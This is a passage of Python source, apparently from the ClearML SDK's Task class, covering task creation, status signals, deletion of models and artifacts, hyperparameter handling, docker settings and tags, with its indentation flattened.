requirements = req_file.read_text() if req_file.is_file() else None
else:
requirements, conda_requirements = pip_freeze(
combine_conda_with_pip=config.get('development.detect_with_conda_freeze', True))
requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\
+ requirements
else:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s')
if isinstance(task_type, self.TaskTypes):
task_type = task_type.value
if task_type not in (self.TaskTypes.training.value, self.TaskTypes.testing.value) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'clearml-server does not support task type "{}", '
'please upgrade clearml-server.'.format(self.TaskTypes.training, task_type))
task_type = self.TaskTypes.training.value
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", ""))
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('execution.model', raise_on_error=False)
return {'Input Model': model_id} if model_id else {}
input_models = self._get_task_property('models.input', default=[]) or []
return {m.name: m.model for m in input_models}
@property
def output_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('output.model', raise_on_error=False)
return {'Output Model': model_id} if model_id else {}
output_models = self._get_task_property('models.output', default=[]) or []
return {m.name: m.model for m in output_models}
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated.
ClearML reloads the Task status information only, when this value is accessed.
return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
def reload(self):
# type: () -> ()
"""
Reload current Task's state from clearml-server.
Refresh all task's fields, including artifacts / models / parameters etc.
"""
return super(Task, self).reload()
def _get_output_model(self, upload_required=True, model_id=None):
# type: (bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or None,
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def _reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self.__reporter is None:
self._setup_reporter()
return self.__reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task=self,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self.__reporter = Reporter(
metrics=self._get_metrics_manager(storage_uri=storage_uri), task=self)
return self.__reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._offline_mode:
# noinspection PyBroadException
try:
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'rt') as f:
stored_dict = json.load(f)
stored_data = tasks.Task(**stored_dict)
# add missing entries
for k, v in stored_dict.items():
if not hasattr(stored_data, k):
setattr(stored_data, k, v)
if stored_dict.get('project_name'):
self._project_name = (None, stored_dict.get('project_name'))
except Exception:
stored_data = self._data
return stored_data or tasks.Task(
execution=tasks.Execution(
parameters={}, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd=''),
output=tasks.Output())
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
# type: (bool) -> ()
"""
Reset the task. Task will be reloaded following a successful reset.
:param set_started_on_success: If True automatically set Task status to started after resetting it.
"""
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.StoppedRequest(self.id, force=force), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
"""
.. note:: Deprecated, use mark_completed(...) instead
"""
warnings.warn("'completed' is deprecated; use 'mark_completed' instead.", DeprecationWarning)
return self.mark_completed(ignore_errors=ignore_errors)
def mark_completed(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None, force=False):
# type: (bool, Optional[str], Optional[str], bool) -> ()
""" The signal that this Task stopped. """
return self.send(
tasks.FailedRequest(
task=self.id, status_reason=status_reason, status_message=status_message, force=force),
ignore_errors=ignore_errors,
)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) not in (str(tasks.TaskStatusEnum.stopped), str(tasks.TaskStatusEnum.completed)):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def _delete(
self,
delete_artifacts_and_models=True,
skip_models_used_by_other_tasks=True,
raise_on_error=False,
):
# type: (bool, bool, bool) -> bool
"""
Delete the task as well as it's output models and artifacts.
Models and artifacts are deleted from their storage locations, each using its URI.
Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are
configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials
are properly configured and that you have delete permission in the related buckets).
:param delete_artifacts_and_models: If True, artifacts and models would also be deleted (default True)
:param skip_models_used_by_other_tasks: If True, models used by other tasks would not be deleted (default True)
:param raise_on_error: If True an exception will be raised when encountering an error.
If False an error would be printed and no exception will be raised.
:return: True if the task was deleted successfully.
"""
try:
res = self.send(tasks.GetByIdRequest(self.task_id))
task = res.response.task
if task.status == Task.TaskStatusEnum.published:
if raise_on_error:
raise self.DeleteError("Cannot delete published task {}".format(self.task_id))
self.log.error("Cannot delete published task {}".format(self.task_id))
return False
execution = {}
models_res = []
if delete_artifacts_and_models:
execution = task.execution.to_dict() if task.execution else {}
models_res = self.send(
models.GetAllRequest(
task=[task.id], only_fields=["id", "uri"]
)
).response.models
event_uris = list(self._get_all_events(
event_type="training_debug_image", unique_selector=itemgetter("url"), batch_size=10000
))
event_uris.extend(self._get_image_plot_uris())
task_deleted = self.send(tasks.DeleteRequest(self.task_id, force=True))
if not task_deleted:
if raise_on_error:
raise self.DeleteError("Failed deleting task {}".format(self.task_id))
self.log.error("Failed deleting task {}".format(self.task_id))
return False
except self.DeleteError:
raise
except Exception as ex:
if raise_on_error:
raise self.DeleteError("Task deletion failed: {}".format(ex))
self.log.error("Task deletion failed: {}".format(ex))
return False
failures = []
if delete_artifacts_and_models:
for e in execution["artifacts"]:
if e["mode"] == "output" and not self._delete_uri(e["uri"]):
failures.append(e["uri"])
for m in models_res:
# noinspection PyBroadException
try:
is_output_model = task.output and (m.id == task.output.model)
res = self.send(
models.DeleteRequest(m.id, force=(not skip_models_used_by_other_tasks)),
ignore_errors=is_output_model
)
# Should delete if model was deleted or if this was the output model (which was already deleted
# by DeleteRequest, and it's URI is dangling
should_delete = is_output_model or res.response.deleted
except SendError as ex:
if (ex.result.meta.result_code, ex.result.meta.result_subcode) == (400, 201):
# Model not found, already deleted by DeleteRequest
should_delete = True
else:
failures.append("model id: {}".format(m.id))
continue
except Exception:
failures.append("model id: {}".format(m.id))
continue
if should_delete and not self._delete_uri(m.uri):
failures.append(m.uri)
event_uris = list(filter(None, event_uris))
for uri in event_uris:
if not self._delete_uri(uri):
failures.append(uri)
failures = list(filter(None, failures))
if len(failures):
error = "Failed deleting the following URIs:\n{}".format(
"\n".join(failures)
)
if raise_on_error:
raise self.DeleteError(error)
self.log.error(error)
return task_deleted
def _delete_uri(self, uri):
# type: (str) -> bool
# noinspection PyBroadException
try:
deleted = StorageHelper.get(uri).delete(uri)
if deleted:
self.log.debug("Deleted file: {}".format(uri))
return True
except Exception as ex:
self.log.error("Failed deleting {}: {}".format(uri, str(ex)))
return False
return False
def _get_image_plot_uris(self):
# type: () -> Set[str]
def image_source_selector(d):
plot = d.get("plot_str")
if plot:
# noinspection PyBroadException
try:
plot = json.loads(plot)
return next(
filter(None, (image.get("source") for image in plot.get("layout", {}).get("images", []))),
None
)
except Exception:
pass
return self._get_all_events(
event_type="plot",
unique_selector=image_source_selector,
batch_size=10000
)
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('mode_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(
self,
model_path, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
model_name=None, # type: Optional[str]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, ClearML uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method),
then ClearML updates the model object associated with the Task an API call. The API call uses with the URI
of the uploaded file, and other values provided by additional arguments.
:param model_path: A local weights file or folder to be uploaded.
If remote URI is provided (e.g. http:// or s3: // etc) then the URI is stored as is, without any upload
:param name: The updated model name.
If not provided, the name is the model weights file filename without the extension.
:param comment: The updated model description. (Optional)
:param tags: The updated model tags. (Optional)
:param model_name: If provided the model name as it will appear in the model artifactory. (Optional)
Default: Task.name - name
:param iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file.
Notice: upload is done is a background thread, while the function call returns immediately
"""
from ...model import OutputModel
output_model = OutputModel(
task=self,
name=model_name or ('{} - {}'.format(self.name, name) if name else self.name),
tags=tags,
comment=comment
)
output_model.connect(task=self, name=name)
url = output_model.update_weights(weights_filename=model_path, iteration=iteration)
return url
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(
self,
model_id=None,
model_name=None,
update_task_design=True,
update_task_labels=True,
name=None
):
# type: (str, Optional[str], bool, bool, Optional[str]) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **ClearML Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name in the artifactory. The model_name is used to locate an existing model
in the **ClearML Server** (backend). If ``model_id`` is not specified,
then ``model_name`` must be specified.
:param update_task_design: Update the Task's design
- ``True`` - ClearML copies the Task's model design from the input model.
- ``False`` - ClearML does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration
- ``True`` - ClearML copies the Task's label enumeration from the input model.
- ``False`` - ClearML does not copy the Task's label enumeration from the input model.
:param name: Model section name to be stored on the Task (unrelated to the model object name itself)
Default: the the model weight filename is used (excluding file extension)
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name and not model_id:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created', 'uri']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
name = name or Path(model.uri).stem
else:
# clear the input model
model = None
model_id = ''
name = name or 'Input Model'
with self._edit_lock:
self.reload()
# store model id
if Session.check_min_api_version("2.13"):
self.send(tasks.AddOrUpdateModelRequest(
task=self.id, name=name, model=model_id, type=tasks.ModelTypeEnum.input
))
else:
# backwards compatibility
self._set_task_property("execution.model", model_id, raise_on_error=False, log_on_error=False)
# Auto populate from model, if empty
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def get_parameters(self, backwards_compatibility=True):
# type: (bool) -> (Optional[dict])
"""
Get the parameters for a Task. This method returns a complete group of key-value parameter pairs, but does not
support parameter descriptions (the result is a dictionary of key-value pairs).
Notice the returned parameter dict is flat:
i.e. {'Args/param': 'value'} is the argument "param" from section "Args"
:param backwards_compatibility: If True (default) parameters without section name
(API version < 2.9, clearml-server < 0.16) will be at dict root level.
If False, parameters without section name, will be nested under "Args/" key.
:return: dict of the task parameters, all flattened to key/value.
Different sections with key prefix "section/"
"""
if not Session.check_min_api_version('2.9'):
return self._get_task_property('execution.parameters')
# API will makes sure we get old parameters with type legacy on top level (instead of nested in Args)
parameters = dict()
hyperparams = self._get_task_property('hyperparams') or {}
if not backwards_compatibility:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
parameters['{}/{}'.format(section, key)] = section_param.value
else:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
if section_param.type == 'legacy' and section in (self._legacy_parameters_section_name, ):
parameters['{}'.format(key)] = section_param.value
else:
parameters['{}/{}'.format(section, key)] = section_param.value
return parameters
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
return self._set_parameters(*args, __update=False, **kwargs)
def _set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
def stringify(value):
# return empty string if value is None
if value is None:
return ""
str_value = str(value)
if isinstance(value, (tuple, list, dict)):
if 'None' in re.split(r'[ ,\[\]{}()]', str_value):
# If we have None in the string we have to use json to replace it with null,
# otherwise we end up with None as string when running remotely
try:
str_json = json.dumps(value)
# verify we actually have a null in the string, otherwise prefer the str cast
# This is because we prefer to have \' as in str and not \" used in json
if 'null' in re.split(r'[ ,\[\]{}()]', str_json):
return str_json
except TypeError:
# if we somehow failed to json serialize, revert to previous std casting
pass
elif any('\\' in str(v) for v in value):
try:
str_json = json.dumps(value)
return str_json
except TypeError:
pass
return str_value
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
prefix = kwargs.pop('__parameters_prefix', None)
descriptions = kwargs.pop('__parameters_descriptions', None) or dict()
params_types = kwargs.pop('__parameters_types', None) or dict()
update = kwargs.pop('__update', False)
# new parameters dict
new_parameters = dict(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
new_parameters.update(kwargs)
if prefix:
prefix = prefix.strip('/')
new_parameters = dict(('{}/{}'.format(prefix, k), v) for k, v in new_parameters.items())
# verify parameters type:
not_allowed = {
k: type(v).__name__
for k, v in new_parameters.items()
if not verify_basic_type(v, self._parameters_allowed_types)
}
if not_allowed:
self.log.warning(
"Skipping parameter: {}, only builtin types are supported ({})".format(
', '.join('%s[%s]' % p for p in not_allowed.items()),
', '.join(t.__name__ for t in self._parameters_allowed_types))
)
new_parameters = {k: v for k, v in new_parameters.items() if k not in not_allowed}
use_hyperparams = Session.check_min_api_version('2.9')
with self._edit_lock:
self.reload()
# if we have a specific prefix and we use hyperparameters, and we use set.
# overwrite only the prefix, leave the rest as is.
if not update and prefix:
parameters = copy(self.get_parameters() or {})
parameters = dict((k, v) for k, v in parameters.items() if not k.startswith(prefix+'/'))
elif update:
parameters = copy(self.get_parameters() or {})
else:
parameters = dict()
parameters.update(new_parameters)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: stringify(v) for k, v in parameters.items()}
if use_hyperparams:
# build nested dict from flat parameters dict:
org_hyperparams = self.data.hyperparams or {}
hyperparams = dict()
# if the task is a legacy task, we should put everything back under Args/key with legacy type
legacy_name = self._legacy_parameters_section_name
org_legacy_section = org_hyperparams.get(legacy_name, dict())
for k, v in parameters.items():
# legacy variable
if org_legacy_section.get(k, tasks.ParamsItem()).type == 'legacy':
section = hyperparams.get(legacy_name, dict())
section[k] = copy(org_legacy_section[k])
section[k].value = str(v) if v else v
description = descriptions.get(k)
if description:
section[k].description = description
hyperparams[legacy_name] = section
continue
org_k = k
if '/' not in k:
k = '{}/{}'.format(self._default_configuration_section_name, k)
section_name, key = k.split('/', 1)
section = hyperparams.get(section_name, dict())
org_param = org_hyperparams.get(section_name, dict()).get(key, tasks.ParamsItem())
param_type = params_types[org_k] if org_k in params_types else org_param.type
if param_type and not isinstance(param_type, str):
param_type = param_type.__name__ if hasattr(param_type, '__name__') else str(param_type)
section[key] = tasks.ParamsItem(
section=section_name, name=key,
value=str(v) if v else v,
description=descriptions[org_k] if org_k in descriptions else org_param.description,
type=param_type,
)
hyperparams[section_name] = section
self._edit(hyperparams=hyperparams)
self.data.hyperparams = hyperparams
else:
execution = self.data.execution
if execution is None:
execution = tasks.Execution(
parameters=parameters, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd='')
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None, value_type=None):
# type: (str, str, Optional[str], Optional[Any]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
:param value_type: The type of the parameters (cast to string and store)
"""
if not Session.check_min_api_version('2.9'):
# not supported yet
description = None
value_type = None
self._set_parameters(
{name: value}, __update=True,
__parameters_descriptions={name: description},
__parameters_types={name: value_type}
)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def delete_parameter(self, name):
# type: (str) -> bool
"""
Delete a parameter byt it's full name Section/name.
:param name: Parameter name in full, i.e. Section/name. For example, 'Args/batch_size'
:return: True if the parameter was deleted successfully
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Delete hyper-parameter is not supported by your clearml-server, "
"upgrade to the latest version")
with self._edit_lock:
paramkey = tasks.ParamKey(section=name.split('/', 1)[0], name=name.split('/', 1)[1])
res = self.send(tasks.DeleteHyperParamsRequest(
task=self.id, hyperparams=[paramkey]), raise_on_errors=False)
self.reload()
return res.ok()
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self._set_parameters(*args, __update=True, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists() and not DOCKER_BASH_SETUP_ENV_VAR.exists():
return
self.set_base_docker(
docker_cmd=DOCKER_IMAGE_ENV_VAR.get(default=""),
docker_setup_bash_script=DOCKER_BASH_SETUP_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd, docker_arguments=None, docker_setup_bash_script=None):
# type: (str, Optional[Union[str, Sequence[str]]], Optional[Union[str, Sequence[str]]]) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by clearml-agent to execute this experiment
inside the provided docker image.
When running remotely the call is ignored
:param docker_cmd: docker container image (example: 'nvidia/cuda:11.1')
:param docker_arguments: docker execution parameters (example: '-e ENV=1')
:param docker_setup_bash_script: bash script to run at the
beginning of the docker before launching the Task itself. example: ['apt update', 'apt-get install -y gcc']
"""
image = docker_cmd.split(' ')[0] if docker_cmd else ''
if not docker_arguments and docker_cmd:
docker_arguments = docker_cmd.split(' ')[1:] if len(docker_cmd.split(' ')) > 1 else ''
arguments = (docker_arguments if isinstance(docker_arguments, str) else ' '.join(docker_arguments)) \
if docker_arguments else ''
if docker_setup_bash_script:
setup_shell_script = docker_setup_bash_script \
if isinstance(docker_setup_bash_script, str) else '\n'.join(docker_setup_bash_script)
else:
setup_shell_script = ''
with self._edit_lock:
self.reload()
if Session.check_min_api_version("2.13"):
self.data.container = dict(image=image, arguments=arguments, setup_shell_script=setup_shell_script)
self._edit(container=self.data.container)
else:
if setup_shell_script:
raise ValueError(
"Your ClearML-server does not support docker bash script feature, please upgrade.")
execution = self.data.execution
execution.docker_cmd = image + (' {}'.format(arguments) if arguments else '')
self._edit(execution=execution)
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
if Session.check_min_api_version("2.13"):
# backwards compatibility
container = self._get_task_property(
"container", raise_on_error=False, log_on_error=False, default={})
return (container.get('image', '') +
(' {}'.format(container['arguments']) if container.get('arguments', '') else '')) or None
else:
return self._get_task_property("execution.docker_cmd", raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts or None if error.
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return execution.artifacts or []
def _add_artifacts(self, artifacts_list):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
List of artifacts (tasks.Artifact) to add to the the task
If an artifact by the same name already exists it will overwrite the existing artifact.
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
if Session.check_min_api_version("2.13") and not self._offline_mode:
req = tasks.AddOrUpdateArtifactsRequest(task=self.task_id, artifacts=artifacts_list, force=True)
res = self.send(req, raise_on_errors=False)
if not res or not res.response or not res.response.updated:
return None
self.reload()
else:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return self.data.execution.artifacts or []
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
if Session.check_min_api_version('2.9'):
configuration = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
configuration[self._default_configuration_section_name] = tasks.ConfigurationItem(
name=self._default_configuration_section_name, value=str(design))
self._edit(configuration=configuration)
else:
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as blob of text.
:return: The model configuration as blob of text.
"""
if Session.check_min_api_version('2.9'):
design = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
if design:
design = design.get(sorted(design.keys())[0]).value or ''
else:
design = self._get_task_property(
"execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id=None, project_name=None):
# type: (Optional[str], Optional[str]) -> ()
# if running remotely and we are the main task, skip setting ourselves.
if self._is_remote_main_task():
return
if not project_id:
assert isinstance(project_name, six.string_types)
res = self.send(projects.GetAllRequest(name=exact_match_regex(project_name)), raise_on_errors=False)
if not res or not res.response or not res.response.projects or len(res.response.projects) != 1:
return False
project_id = res.response.projects[0].id
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
tags = list(set(tags))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
name = name or ''
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.id
assert parent != self.id
